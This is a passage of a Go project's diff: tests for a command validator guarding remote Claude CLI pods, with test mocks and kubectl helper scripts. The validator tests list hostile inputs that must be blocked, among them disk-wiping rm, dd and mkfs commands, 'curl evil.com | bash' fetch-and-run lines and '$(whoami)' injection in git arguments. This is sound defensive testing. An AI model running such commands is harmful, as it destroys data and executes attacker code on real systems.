{"rm rf home", "rm -rf /home", true, "destructive rm"},
{"rm rf etc", "rm -rf /etc", true, "destructive rm"},
{"rm rf parent", "rm -rf ..", true, "destructive rm"},
{"dd command", "dd if=/dev/zero of=/dev/sda", true, "dd command"},
{"mkfs command", "mkfs.ext4 /dev/sda1", true, "mkfs command"},
{"shutdown", "shutdown -h now", true, "shutdown"},
{"reboot", "reboot", true, "reboot"},
{"systemctl stop", "systemctl stop critical-service", true, "dangerous systemctl"},
{"chmod 777 root", "chmod -R 777 /", true, "dangerous chmod"},
{"chown root", "chown -R nobody /", true, "dangerous chown"},
// curl/wget pipe - caught by pipe detection before the curl/wget patterns
{"curl pipe bash", "curl https://evil.com/script.sh | bash", true, "command chaining"},
{"wget pipe sh", "wget -O - https://evil.com | sh", true, "command chaining"},
// Safe rm commands should pass
{"rm single file", "rm file.txt", false, ""},
{"rm directory", "rm -r ./temp", false, ""},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := ShellCommand(tt.cmd)
if (err != nil) != tt.wantErr {
t.Errorf("ShellCommand(%q) error = %v, wantErr %v", tt.cmd, err, tt.wantErr)
return
}
if tt.wantErr && err != nil && tt.errMsg != "" {
if !strings.Contains(err.Error(), tt.errMsg) {
t.Errorf("ShellCommand(%q) error = %v, want error containing %q", tt.cmd, err, tt.errMsg)
}
}
})
}
}
func TestGitArgs(t *testing.T) {
tests := []struct {
name string
args []string
wantErr bool
errMsg string
}{
// Valid git commands
{"status", []string{"status"}, false, ""},
{"log", []string{"log", "--oneline", "-10"}, false, ""},
{"diff", []string{"diff", "HEAD~1"}, false, ""},
{"branch", []string{"branch", "-a"}, false, ""},
{"checkout", []string{"checkout", "-b", "feature/new"}, false, ""},
{"commit", []string{"commit", "-m", "Fix bug"}, false, ""},
{"add", []string{"add", "."}, false, ""},
{"fetch", []string{"fetch", "origin"}, false, ""},
{"pull", []string{"pull", "origin", "main"}, false, ""},
{"push simple", []string{"push", "origin", "main"}, false, ""},
// Empty
{"empty args", []string{}, true, "empty git args"},
// Dangerous subcommands
{"config", []string{"config", "--global", "user.name", "attacker"}, true, "git config"},
{"remote add", []string{"remote", "add", "evil", "https://evil.com/repo"}, true, "git remote"},
// Force push - blocked
{"force push", []string{"push", "-f", "origin", "main"}, true, "force push"},
{"force push long", []string{"push", "--force", "origin", "main"}, true, "force push"},
{"force with lease", []string{"push", "--force-with-lease", "origin", "main"}, true, "force push"},
// Shell injection in args
{"backtick in arg", []string{"log", "--format=`whoami`"}, true, "shell metacharacter"},
{"command sub in arg", []string{"log", "--format=$(whoami)"}, true, "shell metacharacter"},
{"null byte in arg", []string{"log", "file\x00.txt"}, true, "null byte"},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := GitArgs(tt.args)
if (err != nil) != tt.wantErr {
t.Errorf("GitArgs(%v) error = %v, wantErr %v", tt.args, err, tt.wantErr)
return
}
if tt.wantErr && err != nil && tt.errMsg != "" {
if !strings.Contains(err.Error(), tt.errMsg) {
t.Errorf("GitArgs(%v) error = %v, want error containing %q", tt.args, err, tt.errMsg)
}
}
})
}
}
func TestClaudePrompt(t *testing.T) {
tests := []struct {
name string
prompt string
wantErr bool
errMsg string
}{
// Valid prompts
{"simple prompt", "Hello, how are you?", false, ""},
{"code prompt", "Write a function to sort an array", false, ""},
{"multiline prompt", "Line 1\nLine 2\nLine 3", false, ""},
{"unicode prompt", "Hello 你好 🎉", false, ""},
{"special chars", "What does $ mean in bash?", false, ""},
// Empty
{"empty string", "", true, "empty prompt"},
{"whitespace only", " \t\n", true, "empty prompt"},
// Null bytes
{"null byte", "Hello\x00World", true, "null byte"},
// Length limit
{"at limit", strings.Repeat("a", 100000), false, ""},
{"over limit", strings.Repeat("a", 100001), true, "prompt too long"},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := ClaudePrompt(tt.prompt)
if (err != nil) != tt.wantErr {
t.Errorf("ClaudePrompt() error = %v, wantErr %v", err, tt.wantErr)
return
}
if tt.wantErr && err != nil && tt.errMsg != "" {
if !strings.Contains(err.Error(), tt.errMsg) {
t.Errorf("ClaudePrompt() error = %v, want error containing %q", err, tt.errMsg)
}
}
})
}
}
func TestStreamID(t *testing.T) {
tests := []struct {
name string
id string
wantErr bool
errMsg string
}{
// Valid IDs
{"empty allowed", "", false, ""},
{"simple", "cmd-123", false, ""},
{"with underscore", "cmd_123", false, ""},
{"alphanumeric", "abc123XYZ", false, ""},
{"typical id", "cmd-pantheon-001", false, ""},
// Invalid IDs
{"starts with dash", "-cmd", true, "alphanumeric"},
{"starts with underscore", "_cmd", true, "alphanumeric"},
{"contains space", "cmd 123", true, "alphanumeric"},
{"contains special", "cmd@123", true, "alphanumeric"},
{"contains slash", "cmd/123", true, "alphanumeric"},
{"too long", strings.Repeat("a", 65), true, "too long"},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := StreamID(tt.id)
if (err != nil) != tt.wantErr {
t.Errorf("StreamID(%q) error = %v, wantErr %v", tt.id, err, tt.wantErr)
return
}
if tt.wantErr && err != nil && tt.errMsg != "" {
if !strings.Contains(err.Error(), tt.errMsg) {
t.Errorf("StreamID(%q) error = %v, want error containing %q", tt.id, err, tt.errMsg)
}
}
})
}
}
func TestError(t *testing.T) {
// Test error with pattern
err1 := &Error{
Reason: "test reason",
Input: "test input",
Pattern: "test pattern",
}
if !strings.Contains(err1.Error(), "test reason") {
t.Errorf("Error.Error() = %v, want to contain reason", err1.Error())
}
if !strings.Contains(err1.Error(), "test pattern") {
t.Errorf("Error.Error() = %v, want to contain pattern", err1.Error())
}
// Test error without pattern
err2 := &Error{
Reason: "test reason",
Input: "test input",
}
if !strings.Contains(err2.Error(), "test reason") {
t.Errorf("Error.Error() = %v, want to contain reason", err2.Error())
}
}

124
internal/testutil/mocks.go Normal file
View File

@ -0,0 +1,124 @@
// Package testutil provides testing utilities for rdev-api.
package testutil
import (
"context"
"sync"
"github.com/orchard9/rdev/internal/executor"
)
// MockExecutor is a mock implementation of the Executor for testing.
type MockExecutor struct {
mu sync.Mutex
ExecCalls []ExecCall
ExecResult executor.Result
ExecOutputs []OutputLine
PodExistsMap map[string]bool
ConnectionError error
}
// ExecCall records the parameters of an Exec call.
type ExecCall struct {
Cmd *executor.Command
}
// OutputLine represents a line of output to send.
type OutputLine struct {
Stream string
Line string
}
// Ensure MockExecutor implements CommandExecutor at compile time.
var _ executor.CommandExecutor = (*MockExecutor)(nil)
// NewMockExecutor creates a new mock executor.
func NewMockExecutor() *MockExecutor {
return &MockExecutor{
PodExistsMap: make(map[string]bool),
}
}
// Exec mocks command execution.
func (m *MockExecutor) Exec(ctx context.Context, cmd *executor.Command, handler executor.OutputHandler) executor.Result {
m.mu.Lock()
m.ExecCalls = append(m.ExecCalls, ExecCall{Cmd: cmd})
outputs := m.ExecOutputs
result := m.ExecResult
m.mu.Unlock()
// Send mock outputs
for _, o := range outputs {
select {
case <-ctx.Done():
return executor.Result{ExitCode: 130, Error: ctx.Err()}
default:
handler(o.Stream, o.Line)
}
}
return result
}
// SetExecResult sets the result to return from Exec.
func (m *MockExecutor) SetExecResult(result executor.Result) {
m.mu.Lock()
defer m.mu.Unlock()
m.ExecResult = result
}
// SetExecOutputs sets the outputs to send during Exec.
func (m *MockExecutor) SetExecOutputs(outputs []OutputLine) {
m.mu.Lock()
defer m.mu.Unlock()
m.ExecOutputs = outputs
}
// PodExists mocks pod existence check.
func (m *MockExecutor) PodExists(ctx context.Context, podName string) (bool, error) {
m.mu.Lock()
defer m.mu.Unlock()
exists, ok := m.PodExistsMap[podName]
if !ok {
return false, nil
}
return exists, nil
}
// CheckConnection mocks cluster connection check.
func (m *MockExecutor) CheckConnection(ctx context.Context) error {
m.mu.Lock()
defer m.mu.Unlock()
return m.ConnectionError
}
// SetConnectionError sets the error to return from CheckConnection.
func (m *MockExecutor) SetConnectionError(err error) {
m.mu.Lock()
defer m.mu.Unlock()
m.ConnectionError = err
}
// SetPodExists sets whether a pod exists.
func (m *MockExecutor) SetPodExists(podName string, exists bool) {
m.mu.Lock()
defer m.mu.Unlock()
m.PodExistsMap[podName] = exists
}
// GetExecCalls returns all recorded Exec calls.
func (m *MockExecutor) GetExecCalls() []ExecCall {
m.mu.Lock()
defer m.mu.Unlock()
return append([]ExecCall{}, m.ExecCalls...)
}
// Reset clears all recorded calls and resets the mock.
func (m *MockExecutor) Reset() {
m.mu.Lock()
defer m.mu.Unlock()
m.ExecCalls = nil
m.ExecOutputs = nil
m.ExecResult = executor.Result{}
m.PodExistsMap = make(map[string]bool)
}

View File

@ -0,0 +1,66 @@
// Package testutil provides testing utilities for rdev-api.
package testutil
import (
"context"
"database/sql"
"os"
"testing"
"time"
_ "github.com/lib/pq" // PostgreSQL driver
)
// TestDB returns a database connection for testing.
// Uses TEST_DATABASE_URL or falls back to the standard local dev connection.
func TestDB(t *testing.T) *sql.DB {
t.Helper()
dsn := os.Getenv("TEST_DATABASE_URL")
if dsn == "" {
dsn = "postgres://appuser:localdev@localhost:5433/rdev?sslmode=disable"
}
db, err := sql.Open("postgres", dsn)
if err != nil {
t.Fatalf("open database: %v", err)
}
// Verify connection
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
if err := db.PingContext(ctx); err != nil {
t.Skipf("database not available: %v", err)
}
t.Cleanup(func() {
db.Close()
})
return db
}
// CleanupTestKeys removes all test keys from the database.
func CleanupTestKeys(t *testing.T, db *sql.DB) {
t.Helper()
_, err := db.Exec("DELETE FROM api_keys WHERE name LIKE 'test-%'")
if err != nil {
t.Fatalf("cleanup test keys: %v", err)
}
}
// TimePtr returns a pointer to a time.Time.
func TimePtr(t time.Time) *time.Time {
return &t
}
// MustParseTime parses a time string or panics.
func MustParseTime(layout, value string) time.Time {
t, err := time.Parse(layout, value)
if err != nil {
panic(err)
}
return t
}

61
scripts/claude-auth.sh Executable file
View File

@ -0,0 +1,61 @@
#!/bin/bash
# claude-login.sh - Authenticate Claude CLI in a claudebox pod
# Usage: ./scripts/claude-login.sh <project>
# Example: ./scripts/claude-login.sh pantheon
set -e
# Check for project argument
if [ -z "$1" ]; then
echo "Usage: $0 <project>"
echo ""
echo "Available projects:"
KUBECONFIG=~/.kube/orchard9-k3sf.yaml kubectl get pods -n rdev -l app.kubernetes.io/part-of=rdev \
--no-headers -o custom-columns=":metadata.labels.rdev\.orchard9\.ai/project" 2>/dev/null | grep -v "^$" | sort -u
echo ""
echo "Example: $0 pantheon"
exit 1
fi
PROJECT="$1"
POD="claudebox-${PROJECT}-0"
NAMESPACE="rdev"
# Verify kubeconfig
export KUBECONFIG=~/.kube/orchard9-k3sf.yaml
# Check if pod exists and is running
echo "Checking pod status..."
STATUS=$(kubectl get pod "$POD" -n "$NAMESPACE" -o jsonpath='{.status.phase}' 2>/dev/null || echo "NotFound")
if [ "$STATUS" != "Running" ]; then
echo "Error: Pod $POD is not running (status: $STATUS)"
echo ""
echo "Available pods:"
kubectl get pods -n "$NAMESPACE" -l app.kubernetes.io/part-of=rdev
exit 1
fi
echo ""
echo "=== Claude Login for $PROJECT ==="
echo ""
echo "This will open an interactive session to authenticate Claude."
echo "You'll see a URL - open it in your browser to complete authentication."
echo ""
echo "Press Ctrl+C to cancel, or Enter to continue..."
read
# Run claude interactively (will prompt for auth if needed)
echo "Starting Claude..."
kubectl exec -it "$POD" -n "$NAMESPACE" -c claudebox -- claude
echo ""
echo "=== Authentication Complete ==="
echo ""
echo "Verifying Claude is authenticated..."
kubectl exec "$POD" -n "$NAMESPACE" -c claudebox -- claude --version
echo ""
echo "Claude is now authenticated in $POD"
echo "You can run commands via the API or directly:"
echo " kubectl exec -it $POD -n $NAMESPACE -- claude"

View File

@ -1,6 +1,6 @@
#!/bin/bash
# Create Kubernetes secret from local Claude credentials
# Run this after authenticating with `claude login` locally
# Run this after authenticating with `claude` locally
set -e
@ -15,7 +15,7 @@ fi
CLAUDE_DIR="$HOME/.claude"
if [[ ! -d "$CLAUDE_DIR" ]]; then
echo "Error: Claude credentials not found at $CLAUDE_DIR"
echo "Run 'claude login' first to authenticate"
echo "Run 'claude' first to authenticate"
exit 1
fi

View File

@ -25,7 +25,7 @@ kubectl cluster-info > /dev/null || {
}
# Note: Claude auth is stored in a PVC, not a secret
# User will authenticate via: kubectl exec -it -n rdev claudebox-0 -- claude login
# User will authenticate via: kubectl exec -it -n rdev claudebox-0 -- claude
# Check if ghcr-secret exists in rdev namespace
if ! kubectl get secret ghcr-secret -n rdev > /dev/null 2>&1; then